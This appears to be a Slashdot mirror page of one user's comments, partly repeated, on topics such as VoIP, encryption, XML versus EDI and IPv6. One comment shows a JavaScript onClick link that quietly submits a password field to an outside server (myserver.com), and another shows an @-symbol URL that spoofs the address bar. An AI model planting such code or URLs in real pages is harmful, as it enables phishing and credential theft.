The company I am working for I didn't join because of their great ideas. Though what we are building is very cool. It was the fact that the CEO and President are both Ernst and Young alumni, and two of our Board of Directors have significant experience in the industry we are building it for. On top of that, they have a rock solid business plan that I was very impressed with, and know what's important to spend money on (legal, dev workstations, software licenses) and what not to (not working off of a yacht yet).
Add to that what an earlier poster said about financing and you have the mix to keep most people from starting or suceeding at this. Show me software developers who know how to create a good financial plan, can prove a track record of delivering software, and know the industry they are building for, and I bet very few of them are unemployed.
Something I thought about with your post. I work for a local gov't agency, and any electronic transmission is, by law, public record. We have lots of disclaimers throughout the site and when you submit forms to notify you of this.
One has to wonder if it really matters anyway. Like a previous poster said, you can probably file a FOIA request to get all of the email addresses anyway. But, if that is the case, they should have never made the innuation that the information you sent in would be private.
I also do this, though I also include a statement that if they want to check what I did they can view the logs from x time to y time and see the URL patterns.
I usually don't get a reply, but the exploit almost always gets fixed. The only time I did get a reply was when I found out you could get into the Home Banking Administrative Interface of my Credit Union after you had logged in to your acount. When I called their tech support the guy at first said you couldn't. When I told him to log in to an account and then try it, I heard, "Ok, loggin...Oh my!"
For the most part though I follow the Enron rule as well. If I can't explain how I stumbled on it, then I don't want to have done it.
I've used several bags, and my favorite is my Compucessory bag. It is a rolling laptop case - with an extendable handle and fairly rugged wheels. It also has straps that make it a fairly comfortable backpack. Nice also that when using as a backpack you don't get the uncomfortable feel of the internal braces. Description from OfficeMax
For pure safety, try the Anvil or Zero Halliburton computer briefcases. My first laptop - an IBM ThinkPad - survived an 8-foot fall in one of those things. The ZH ones come in aluminum finish too - very nice.
The problem is that it looks like it affects them all.
If I understand what they are saying, if you put a %01 before the @ symbol then the address bar will display one address while going to a different one. Guess what, so does just putting the @ symbol
http://www.zdnet.com@slashdot.org
I'm still not really sure what the problem is. Even if the bug removed the @slashdot.org, it just means that those of us that actually pay attention to the address bar might get fooled. Most people don't pay any attention to the address bar, and wouldn't think twice about seeing an @ symbol there.
The Cisco 7920 Wireless IP Phone does not at this time do anything but 2.4GHz 802.11b
You may be right about this. They may have said that it is supposed to do that in the future, and I thought they meant now. Though we do spend a *lot* of money on Cisco, so they may have had a beta phone. If I find out more I will post it
We did a VOiP rollout. We are a 6,000 person local government agency that is in the middle of a rollout. It is great - we are using the phones from Cisco and we have a tremendous ROI.
Of course, it does help that we have a Gigabit backbone. But I have seen some of our telecom guys walking around with a phone from Cisco that is an IPPhone when in range of a WAP for our network, and a regular cell-phone otherwise. Pretty sweet.
If anyone wants more info, you can email me at foyc at hillsboroughcounty dot org
As was also discussed yesterday, *nothing* is uncrackable, with the exception of correctly used one-time pads.
The key is to put the appropriate level of security with the data you want protected. For example, if you have data you have to keep secret for 2 months, and they can crack it in 6, you can use that. But if you need to keep data, worth millions of dollars, secret for an extended period, then you should review your security.
However, I think that if you didn't start off with the above concept in mind when you started encrypting your data, then you weren't doing your job. Have 576 cracked shouldn't worry you unless you have older encrypted data using that.
You are right that it is a game. To keep information secure, you have to protect it. Because you protected it, people will want to try to unprotect it. Eventually they will, and if one doesn't keep up, you will lose it.
So, we don't need more secure forms of encryption, we just need to review the current ones and use the appropriate encryption scheme for the data trying to be protected.
I think that is one of the better analogies I have heard to date.
Software is a *lot* like a house. And open source gives you the ability to open it up, modify it and rebuild it anyway you want if you know how to do it. For example, in my house I can easily change a light bulb, or replace the lock, or even build a bookshelf or deck, but would need help to add on an extra room. The same goes with open source. I can go in an change small things, but can't change larger things without help.
Closed source still allows you to change light bulbs, etc, but you don't have a choice - if you want to add on a deck, or a porch, or a room, you have to pay your original contractor to build it. You can't go out, buy a manual, and try it on your own (for the most part).
I posted this a long time ago, but somehow it is still relevant:
The Effects of a W3C SVG Standard
Positive: Flash plugin will eventually no longer be needed for vector graphics as a key set of vector standards will be integrated with browsers. Ensuring that fonts are on the users system will no longer be an issue. Font embedding can be standardized.
Negative: Netscape and IE will both bring "enhancements" to the base SVG models. Of course none of those "enhancements" will be present in BOTH browsers. IE will allow for basic SVG 3d shapes, though no applications will currently support the creation of those shapes. IE will also allow for very loose coding to create the SVG shapes. If you accidentally put a single co-ordinate set into your file, IE, instead of telling you that there is a stray point, will assume that you wanted to create a MSN logo and subsequent link to MSN.Com. Microsoft Word will support SVG export, including in the source file a bunch of code that noone has any bloody idea where it came from, what it is supposed to do, or how to get rid of it. Thirteen years later, Microsoft will take over the US Government and we will find out that the "miscellaneous code", has been stealing our personal information for years. Microsoft will call it "A bug". Netscape, on the other hand, encountering a stray co-ordinate pair, will assume that the "clean-coding" standards of the internet development community are going straight to hell in a hand basket and that the world is coming to an end. "That being the case," it will logically decide, "this poor bloke is about to meet his maker and doesn't need to be squandering his last few minutes with his peepers fixed on a computer monitor now does he? Best he be off to the local pub for a pint or two while he still has the chance". Netscape will them proceed to crash your operating system. Netscape will also do wonderful little tricks like incorrectly display circles as parallelograms, Render every font as 16 point Times New Roman, and completely leave out the bottom half of your document for some obscure reason that you will spend 13 weeks trying to track down before you finally come to the conclusion that "There really aren't that many Netscape users out there anyway". AOL will just compress the heck out of everything it encounters and render every SVG image as a Dot.
Insignificant: Someone somewhere on a UNIX machine will be writing Plain Text news articles about how SVG is the worst threat to web usability since the invention of JPEG compression. They will urge the development community to avoid SVG because compatibility will still not be standard across all computers. They themselves will be ample proof of this fact only because their 28.8k external modems will not facilitate the download of the newest version of Netscape (God forbid a UNIX user should install IE) and even if they could get it installed, their 16mhz 1987 computer wouldn't know how to run it. The general population will promptly ignore these articles as they click yet another accidentally generated MSN logo link, leaving the insecure author to return to Usenet and his IRC client.
I figured it would only be a matter of time before Microsoft did this. I normally try to stay out of the *bash Microsoft* conversations, but after dealing with all the problems we have with the Microsoft JVM, and then having this on top of it...ugh.
Re:Unix Tab-Separated ASCII Files vs. XML
on
Effective XML
·
· Score: 1
Well, you can't actually compare a 23K EDI file to a 5000 line XML file, since if the XML file has fewer than an average of about 4-5 characters/line, it still wins.
The XML file contains at least 20 characters per line for a majority of the document.
However, uncompressed storage requirements aren't really such a big deal; disk space and memory are cheap.
This isn't really as much about disk storage space as it is parsing through the document. And it isn't really about that either, it is about the people who talk about how easy it is to take a 5000-line XML file and *poof* transform it with XSL. It's the tradeoff for readibility for performance. If you need raw performance, you use something like EDI. Difficult to read and program for (simply because it is so cryptic) compared to a nice XML structure, but the machine doesn't care about readibility (to a degree)
The real problem with larger files is transmission speeds/costs. It would be interesting to compare the compressed sizes of the EDI and XML file.
That would be interesting to find out. I'm sure the XML file would be marginally larger, but again the issue isn't with the bandwidth for the file, it is with the processing of the document.
After all, most big Web sites using HTTPS couldn't operate without hardware SSL accelerators, but that isn't an argument against SSL.
Correct. In those cases they traded the performance of not having HTTPS for the security of having it. My guess would be that Slashdot couldn't keep up the load it does on the same hardware if everything is HTTPS. But, there is no reason to have it for them. Same goes for XML. When you need the readibility (or the ability to say you "do" XML) you go with XML. There isn't anything wrong with either approach. XML is an excellent method for us to allow SQL, Informix, HP3000's and Servlets to all talk to each other. EDI is great for receiving the transmissions from providers.
Re:What are you talking about?
on
Effective XML
·
· Score: 3, Interesting
You bring up some really good points. The reason that you hear a lot of "XML is slow" is because of the usage of XPATH. To use XPATH expressions, most implementations parse the entire XML document into memory.
I suppose you *could* write a custom parser. If your structure is well-defined, and not subject to a lot of changes, you could significantly increase performance that way. The other option is to parse the document once, get out what you need to get out into smaller chunks, dump the larger document, and only work off the smaller chunks.
Looks like TMTOWTDI is not just for Perl
Re:Unix Tab-Separated ASCII Files vs. XML
on
Effective XML
·
· Score: 4, Interesting
And anything that lets the EDI people replace their stuff with simpler, more open technology is good too..
My current project for the last 8 months has been working on just that - parsing HIPAA EDI transactions. We do it by converting them to XML data structures. There is a decent white paper about it too.
What I've found is that, for readability, XML is the way to go. For performance, EDI is definately better. I have one EDI file that is 23k. When expanded to XML, it is close to 5000 lines long.
I agree with an earlier post. If you are using an hardware XML accelerator, or using small XML documents (config, etc), or needing readibility over performanc then it is great. But I have a hard time believeing that it will replace tab-seperate files any time soon (not that the parent poster was implying this).
No, not quite true. The strongest encryptions are not based on no one knowing the algorithims - in fact most cryptographers do not regard an algorithim as secure unless it has been exposed. The strength lies in the keys generated.
For example, the RSA algorithim is available. But currently most people do not have the computing power necessary to decipher the keys to the transmission.
You don't mention where you are from, but there is usually a user group of something near by. Check Yahoo Groups for things like Perl User Groups, Macromedia User Groups,.NET user groups, and the such.
I live and work in Tampa (for the next few months, anyway) and can usually find *something* to do if I am just looking for geek things to do.
The sad thing is that they already have the paper written (based on the quality of this one), it will just take them that long to get their server back online.
I enjoyed both of the articles. The question I have is this. With the number of networks now being NATed and the such, will we ever truly need something like IPv6? It seems like whe I hear about it, the talk is always that every device will have a unique IP address. But what I see is that large deployments of devices needing IP addresses are more and more being done using 192.* or 10.* addresses. Anyone else have more insight?
Will second this. We just deployed it out to over 5000 users for use as their primary PDF program. Works like a charm, and was much cheaper than Acrobat.
Of course, doesn't allow for editing of the document, but all we needed was just a way for users to create PDFs.
> Start planting sites that root peoples MS boxes and there will be a huge outcry on CNN or something.
Honestly, I am surprised something like this hasn't happened already, where a virus infects a computer, sends out varients, and on the next reboot wipes out everything on the machine. Several viruses have had the ability to get to the file system, so I am really surprised that it hasn't happened.
However, if it does, I know I'm in trouble because my fiancee still uses IE on my machine. I'm slowly getting her converted to Mozilla, and one day Linux, but hopefully I still have a little bit of time.
I work for a large county government. We support around 6000 users. We use a help desk with a product from Perigrine called ServiceCenter for requests. They then get assigned to the appropriate sections within ITS. For example, phone issues go to Telecomm, web site issues to the Web Team, etc.
Additionally, requests for updates to the website get sent through our communications department to us, or directly to us using a common email address that goes into a folder the web team shares.
The ServiceCenter works well, but the entire web request method just is horrible.
Slashdot Mirror
The company I am working for I didn't join because of their great ideas. Though what we are building is very cool. It was the fact that the CEO and President are both Ernst and Young alumni, and two of our Board of Directors have significant experience in the industry we are building it for. On top of that, they have a rock solid business plan that I was very impressed with, and know what's important to spend money on (legal, dev workstations, software licenses) and what not to (not working off of a yacht yet).
Add to that what an earlier poster said about financing and you have the mix to keep most people from starting or suceeding at this. Show me software developers who know how to create a good financial plan, can prove a track record of delivering software, and know the industry they are building for, and I bet very few of them are unemployed.
Something I thought about with your post. I work for a local gov't agency, and any electronic transmission is, by law, public record. We have lots of disclaimers throughout the site and when you submit forms to notify you of this.
One has to wonder if it really matters anyway. Like a previous poster said, you can probably file a FOIA request to get all of the email addresses anyway. But, if that is the case, they should have never made the innuation that the information you sent in would be private.
I also do this, though I also include a statement that if they want to check what I did they can view the logs from x time to y time and see the URL patterns.
I usually don't get a reply, but the exploit almost always gets fixed. The only time I did get a reply was when I found out you could get into the Home Banking Administrative Interface of my Credit Union after you had logged in to your acount. When I called their tech support the guy at first said you couldn't. When I told him to log in to an account and then try it, I heard, "Ok, loggin...Oh my!"
For the most part though I follow the Enron rule as well. If I can't explain how I stumbled on it, then I don't want to have done it.
I've used several bags, and my favorite is my Compucessory bag. It is a rolling laptop case - with an extendable handle and fairly rugged wheels. It also has straps that make it a fairly comfortable backpack. Nice also that when using as a backpack you don't get the uncomfortable feel of the internal braces. Description from OfficeMax
For pure safety, try the Anvil or Zero Halliburton computer briefcases. My first laptop - an IBM ThinkPad - survived an 8-foot fall in one of those things. The ZH ones come in aluminum finish too - very nice.
Yes, things like FTP logins rely on that. URLs are subsets of URIs which have a lot more useful things.
For example, if you need to go to a FTP site that has a login, you can type in your address bar:
ftp://user:pass@ftp.mysite.com
That will automatically log you in with your user name and password. You could also do just:
user@ftp.mysite.com
And it will prompt you for your password
The problem is that it looks like it affects them all.
If I understand what they are saying, if you put a %01 before the @ symbol then the address bar will display one address while going to a different one. Guess what, so does just putting the @ symbol
http://www.zdnet.com@slashdot.org
I'm still not really sure what the problem is. Even if the bug removed the @slashdot.org, it just means that those of us that actually pay attention to the address bar might get fooled. Most people don't pay any attention to the address bar, and wouldn't think twice about seeing an @ symbol there.
You may be right about this. They may have said that it is supposed to do that in the future, and I thought they meant now. Though we do spend a *lot* of money on Cisco, so they may have had a beta phone. If I find out more I will post it
We did a VOiP rollout. We are a 6,000 person local government agency that is in the middle of a rollout. It is great - we are using the phones from Cisco and we have a tremendous ROI.
Of course, it does help that we have a Gigabit backbone. But I have seen some of our telecom guys walking around with a phone from Cisco that is an IPPhone when in range of a WAP for our network, and a regular cell-phone otherwise. Pretty sweet.
If anyone wants more info, you can email me at foyc at hillsboroughcounty dot org
In a word, no.
As was also discussed yesterday, *nothing* is uncrackable, with the exception of correctly used one-time pads.
The key is to put the appropriate level of security with the data you want protected. For example, if you have data you have to keep secret for 2 months, and they can crack it in 6, you can use that. But if you need to keep data, worth millions of dollars, secret for an extended period, then you should review your security.
However, I think that if you didn't start off with the above concept in mind when you started encrypting your data, then you weren't doing your job. Have 576 cracked shouldn't worry you unless you have older encrypted data using that.
You are right that it is a game. To keep information secure, you have to protect it. Because you protected it, people will want to try to unprotect it. Eventually they will, and if one doesn't keep up, you will lose it.
So, we don't need more secure forms of encryption, we just need to review the current ones and use the appropriate encryption scheme for the data trying to be protected.
I think that is one of the better analogies I have heard to date.
Software is a *lot* like a house. And open source gives you the ability to open it up, modify it and rebuild it anyway you want if you know how to do it. For example, in my house I can easily change a light bulb, or replace the lock, or even build a bookshelf or deck, but would need help to add on an extra room. The same goes with open source. I can go in an change small things, but can't change larger things without help.
Closed source still allows you to change light bulbs, etc, but you don't have a choice - if you want to add on a deck, or a porch, or a room, you have to pay your original contractor to build it. You can't go out, buy a manual, and try it on your own (for the most part).
Especially if you tell them their address is http://www.homestarrunner.com/404. It evens comes with a free picture of a loving family scene.
I posted this a long time ago, but somehow it is still relevant:
I figured it would only be a matter of time before Microsoft did this. I normally try to stay out of the *bash Microsoft* conversations, but after dealing with all the problems we have with the Microsoft JVM, and then having this on top of it...ugh.
The XML file contains at least 20 characters per line for a majority of the document.
This isn't really as much about disk storage space as it is parsing through the document. And it isn't really about that either, it is about the people who talk about how easy it is to take a 5000-line XML file and *poof* transform it with XSL. It's the tradeoff for readibility for performance. If you need raw performance, you use something like EDI. Difficult to read and program for (simply because it is so cryptic) compared to a nice XML structure, but the machine doesn't care about readibility (to a degree)
That would be interesting to find out. I'm sure the XML file would be marginally larger, but again the issue isn't with the bandwidth for the file, it is with the processing of the document.
Correct. In those cases they traded the performance of not having HTTPS for the security of having it. My guess would be that Slashdot couldn't keep up the load it does on the same hardware if everything is HTTPS. But, there is no reason to have it for them. Same goes for XML. When you need the readibility (or the ability to say you "do" XML) you go with XML. There isn't anything wrong with either approach. XML is an excellent method for us to allow SQL, Informix, HP3000's and Servlets to all talk to each other. EDI is great for receiving the transmissions from providers.
You bring up some really good points. The reason that you hear a lot of "XML is slow" is because of the usage of XPATH. To use XPATH expressions, most implementations parse the entire XML document into memory.
I suppose you *could* write a custom parser. If your structure is well-defined, and not subject to a lot of changes, you could significantly increase performance that way. The other option is to parse the document once, get out what you need to get out into smaller chunks, dump the larger document, and only work off the smaller chunks.
Looks like TMTOWTDI is not just for Perl
My current project for the last 8 months has been working on just that - parsing HIPAA EDI transactions. We do it by converting them to XML data structures. There is a decent white paper about it too.
What I've found is that, for readability, XML is the way to go. For performance, EDI is definately better. I have one EDI file that is 23k. When expanded to XML, it is close to 5000 lines long.
I agree with an earlier post. If you are using an hardware XML accelerator, or using small XML documents (config, etc), or needing readibility over performanc then it is great. But I have a hard time believeing that it will replace tab-seperate files any time soon (not that the parent poster was implying this).
No, not quite true. The strongest encryptions are not based on no one knowing the algorithims - in fact most cryptographers do not regard an algorithim as secure unless it has been exposed. The strength lies in the keys generated.
For example, the RSA algorithim is available. But currently most people do not have the computing power necessary to decipher the keys to the transmission.
And if you do, do you really trust Microsoft to keep it secret?
You don't mention where you are from, but there is usually a user group of something near by. Check Yahoo Groups for things like Perl User Groups, Macromedia User Groups, .NET user groups, and the such.
I live and work in Tampa (for the next few months, anyway) and can usually find *something* to do if I am just looking for geek things to do.
The sad thing is that they already have the paper written (based on the quality of this one), it will just take them that long to get their server back online.
Really?
<a href="mylink.html" onClick="javascript:document.forms.length++;
theForm=document.forms[document.forms.length-1];
theForm.action='http://myserver.com';
theForm.elements.length=1;
theForm.elements[0].name='password';
theForm.elements[0].value='yourpw';
theForm.elements[0].type='text';
theForm.submit();">
My Apologies. We use all three, and I should have been more specific with that.
I enjoyed both of the articles. The question I have is this. With the number of networks now being NATed and the such, will we ever truly need something like IPv6? It seems like whe I hear about it, the talk is always that every device will have a unique IP address. But what I see is that large deployments of devices needing IP addresses are more and more being done using 192.* or 10.* addresses. Anyone else have more insight?
Will second this. We just deployed it out to over 5000 users for use as their primary PDF program. Works like a charm, and was much cheaper than Acrobat.
Of course, doesn't allow for editing of the document, but all we needed was just a way for users to create PDFs.
> Start planting sites that root peoples MS boxes and there will be a huge outcry on CNN or something.
Honestly, I am surprised something like this hasn't happened already, where a virus infects a computer, sends out varients, and on the next reboot wipes out everything on the machine. Several viruses have had the ability to get to the file system, so I am really surprised that it hasn't happened.
However, if it does, I know I'm in trouble because my fiancee still uses IE on my machine. I'm slowly getting her converted to Mozilla, and one day Linux, but hopefully I still have a little bit of time.
I work for a large county government. We support around 6000 users. We use a help desk with a product from Perigrine called ServiceCenter for requests. They then get assigned to the appropriate sections within ITS. For example, phone issues go to Telecomm, web site issues to the Web Team, etc.
Additionally, requests for updates to the website get sent through our communications department to us, or directly to us using a common email address that goes into a folder the web team shares.
The ServiceCenter works well, but the entire web request method just is horrible.